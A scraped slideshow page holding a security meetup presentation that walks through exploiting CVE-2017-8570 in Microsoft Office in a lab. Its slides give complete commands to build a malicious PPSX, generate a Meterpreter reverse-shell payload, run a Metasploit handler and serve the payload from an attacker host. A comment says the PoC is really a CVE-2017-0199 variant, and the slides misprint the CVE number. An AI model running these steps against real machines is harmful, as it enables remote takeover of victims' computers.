Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

CVE-2017-8570 presentation

158 views

Published on

Presentation for the null.co.in

Published in: Education
  • The POC created by bhdresh is actually CVE-2017-0199 PPSX version. It is not using Composite Moniker. I have confirmed by testing it on a machine patched till May 2017 and it is not working. Most probably it was a mistake to name it CVE-2017-8570. Please confirm it at your end before presentation.
       Reply 
    Are you sure you want to  Yes  No
    Your message goes here
  • Be the first to like this

CVE-2017-8570 presentation

  1. 1. CVE 2017-8570 Created by github.com/bhdresh
  2. 2. Introduction: • CVE- Common Vulnerbilities and Exposures (CVE 2107-8570) • CVE-2107-8570- is a remote code execution vulnerability exists in Microsoft Office software when it fails to properly handle objects in memory. An attacker who successfully exploited the vulnerability could use a specially crafted file to perform actions in the security context of the current user. For example, the file could then take actions on behalf of the logged-on users with the same permissions as the current user. Exploitation on this vulnerability requires that a user open a specially crafted file with an affected version of Microsoft Office Software.
  3. 3. Scenario:
  4. 4. Requirements: Kali linux, Metasploit(with running server), victim(In our case it is Windows 7, with Microsoft Office 2013 x64 installed).
  5. 5. Guide: • 1) Generate malicious PPSX file • (/tmp/CVE directory) • # python2.7 cve-2017-8570_toolkit.py -M gen -w Invoice.ppsx -u http://10.0.2.15/logo.doc
  6. 6. Guide cont’d: Generate Payload with msf venom. • # msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.0.2.15 LPORT=4444 -f exe > /tmp/shell.exe
  7. 7. Guide cont’d: Start Metasploit server • Notice: This is an important thing!!!! This service should be running, because without it metasploit framework is not going to be connected to server. • service postgresql start
  8. 8. Guide cont’d: Starting the mfconsole • # msfconsole -x "use multi/handler; set PAYLOAD windows/x64/meterpreter/reverse_tcp; set LHOST 10.0.2.15; run" • (In /tmp directory)
  9. 9. Guide cont’d: Start toolkit in exploit mode to deliver local payload • Will be started on port 80. #python2.7 cve-2017-8570_toolkit.py -M exp -e http://10.0.2.15/shell.exe -l /tmp/shell.exe • (In /tmp/CVE directory)
  10. 10. The connection is established. • Now you can use any command in meterpreter to use victim’s PC.
  11. 11. Patch: • In the most recent Microsoft Office Security Update; Microsoft have released a patch to prevent this exploit. • One more thing; I have tried transferring this presentation through Gmail, it did not work; in my opinion, Gmail is removing the executable code from the presentation. Moreover, it is showing that similar files were used to steal personal information.
  12. 12. Example:
  13. 13. That’s it. Thank you. Any Questions?

×